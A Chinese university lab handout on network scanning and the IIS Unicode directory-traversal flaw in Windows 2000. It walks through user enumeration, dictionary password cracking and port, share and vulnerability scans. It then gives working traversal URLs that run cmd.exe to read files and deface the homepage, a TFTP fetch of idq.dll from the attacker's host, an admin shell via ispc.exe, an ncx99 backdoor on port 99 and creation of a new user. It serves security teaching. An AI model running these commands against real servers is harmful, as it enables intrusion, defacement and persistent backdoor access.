1、实验二 网络扫描与Unicode漏洞实验二 网络扫描与Unicode漏洞实验目的:1.掌几种网络扫描工具的使用方法及功能;2.利用扫描出的Unicode漏洞并体验该漏洞的危害。实验内容及要求:1参考以下工具软件及过程,对一台操作系统是Windows 2000 Server或者是Windows 2000 Advanced Server的计算机进行扫描,写扫描报告,并提供图示(ip地址不可与示例中相同),要求如下:(1)简单描述过程并记录对方用户列表等结果;(2)记录共享的目录扫描结果;(3)存在的漏洞扫描结果。2参考以下过程,利用扫描出的Unicode漏洞完成以下内容,简单描述过程并图示结果(i
2、p地址不可与示例中相同),要求如下:(1)利用Unicode漏洞读取系统盘目录;(2)查看操作系统的类型;(3)对目标主机web页面的简单修改或删除;(4)对目标主机的文件(夹)操作方法-拷贝文件。(5)利用工具软件进一步入侵对方主机,建立一个用户:hax,密码:654321,记录入侵过程并截取关键图示。参考内容:1.系统用户扫描(案例4-1)使用工具软件:GetNTUser,该工具可以在Winnt4以及Win2000操作系统上使用,主要功能包括:(1)扫描出NT主机上存在的用户名。(2)自动猜测空密码和与用户名相同的密码。(3)可以使用指定密码字典猜测密码。(4)可以使用指定字符来穷举猜测密
3、码。对IP为172.18.25.109的计算机进行扫描,首先将该计算机添加到扫描列表中,选择菜单File下的菜单项“添加主机”,输入目标计算机的IP地址,如图2-1所示。可以得到对方的用户列表了。点击工具栏上的图标,得到的用户列表如图2-2所示。2.密码破解利用该工具可以对计算机上用户进行密码破解,首先设置密码字典,设置完密码字典以后,将会用密码字典里的每一个密码对目标用户进行测试,如果用户的密码在密码字典中就可以得到该密码。一个典型的密码字典如图2-3所示。步骤一:设置密码字典选择菜单栏工具下的菜单项“设置”,设置密码字典为一个文本文件,如图2-4所示。步骤二:字典测试利用密码字典中的密码进
4、行系统破解,选择菜单栏工具下的菜单项“字典测试”,程序将按照字典的设置进行逐一的匹配,如图2-5所示。3.开放端口扫描(案例4-2) 得到对方开放了哪些端口也是扫描的重要一步。使用工具软件PortScan可以到得到对方计算机都开放了哪些端口,主界面如图2-6所示。 对172.18.25.109的计算机进行端口扫描,在Scan文本框中输入IP地址,点击按钮“START”,开始扫描如图2-7所示。4.共享目录扫描(案例4-3)通过工具软件Shed来扫描对方主机,得到对方计算机提供了哪些目录共享。工具软件的主界面如图2-8所示。该软件可以扫描一个IP地址段的共享信息,这里只扫描IP为172.18.2
5、5.109的目录共享情况。在起始IP框和终止IP框中都输入172.18.25.109,点击按钮“开始”就可以得到对方的共享目录了,如图2-9所示。5.漏洞扫描(案例4-5)使用工具软件X-Scan-v3.3。该软件的系统要求为:Windows 9x/NT4/2000。该软件采用多线程方式对指定IP地址段((或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。主界面如图2-10所示。可以利用该软件对系统存在的一些漏洞进行扫描,选择菜单栏设置下的菜单项“扫描参数”,扫描参数的设置如图2-11所示。可以
6、看出该软件可以对常用的网络以及系统的漏洞进行全面的扫描,选中几个复选框,点击按钮“确定”。下面需要确定要扫描主机的IP地址或者IP地址段,选择菜单栏设置下的菜单项“扫描参数”,扫描一台主机,在指定IP范围框中输入:172.18.25.109-172.18.25.109,如图2-12所示。设置完毕后,进行漏洞扫描,点击工具栏上的图标“开始”,开始对目标主机进行扫描,如图2-13所示。6Unicode漏洞扫描使用扫描工具来检测Unicode漏洞是否存在,使用上一章介绍的X-Scan来对目标系统进行扫描,目标主机IP为:172.18.25.109,Unicode漏洞属于IIS漏洞,所以这里只扫描II
7、S漏洞就可以了,X-Scan设置如图4-1所示。将主机添加到目标地址,扫描结果如图4-2所示。7.利用Unicode漏洞读取系统盘目录 这个漏洞的可怕之处就在于不需要其他的登陆软件,只要利用浏览器就能达到访问主机信息的目的!利用该漏洞读取出计算机上目录列表,比如读取C盘的目录,只要在浏览器中输入“http:/192.168.1.3/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:”利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。使用的语句是:http:/172.18.25.109/scr
8、ipts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.ini8.利用Unicode漏洞对目标主机修改主页,使用的语句是:http:/192.168.1.3/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+echo+I+love+my+homeland+ c:inetpubwwwrootdefault.asp9.对目标主机的文件(夹)操作方法-拷贝文件为了是使用方便,利用语句将cmd.exe文件拷贝到scripts目录,并改名为c.exe,使用的语句是:http:/172.18.25.109/scripts/
9、.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe程序执行结果如图4-5所示。 查看C盘的目录,以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:http:/172.18.25.109/scripts/c.exe?/c+dir+c:执行的结果如图4-6所示。10.进一步控制该主机-利用Unicode漏洞入侵系统 在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统,并得到管理员权限。首先需要向对方服务器上传一些文件,入侵的第一
10、步,建立tftp服务器,向对方的scripts文件夹传几个文件。需要上传一个名为“idq.dll”的文件,为了上传这个文件,首先在本地计算机上搭建一个TFTP服务器,普通文件传输协议TFTP(Text File Transmission Protocol)一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序,主界面如图4-7所示。 这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。在浏览器中执行命令:“http:/172.18.25.109/
11、scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll”,命令其实是“tftp i 172.18.25.110 get idq.dll”意思是从172.18.25.110服务器上获取idq.dll文件,执行成功的界面如图4-8所示。 查看scripts目录 上传完毕后可以查看一下scripts目录,是否真的上传成功了。如图4-9所示。http:/192.168.1.3/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir说明已经成功的在scripts目录中上
12、传了一个idq.dll文件,下面使用工具软件ispc.exe入侵对方系统。(另上传一个ncx99)拷贝ispc.exe文件到本地计算机的C盘根目录,在DOS命令行下执行命令:“ispc.exe 172.18.25.109/scripts/idq.dll”,连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限,入侵的过程4-10所示。 11.telnet入侵再使用如下调用来执行ncx99.exe文件http:/192.168.1.3/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+c:inetpubscriptsncx99.exe此时这个黑客就可以telnet 主机了。telnet x.x.x.x 99可以在对方计算机上做管理员可以做的一切事情,比如添加用户,建立一个用户名为“Hacker123”,密码也是“Hacker123”的用户,如图4-11所示。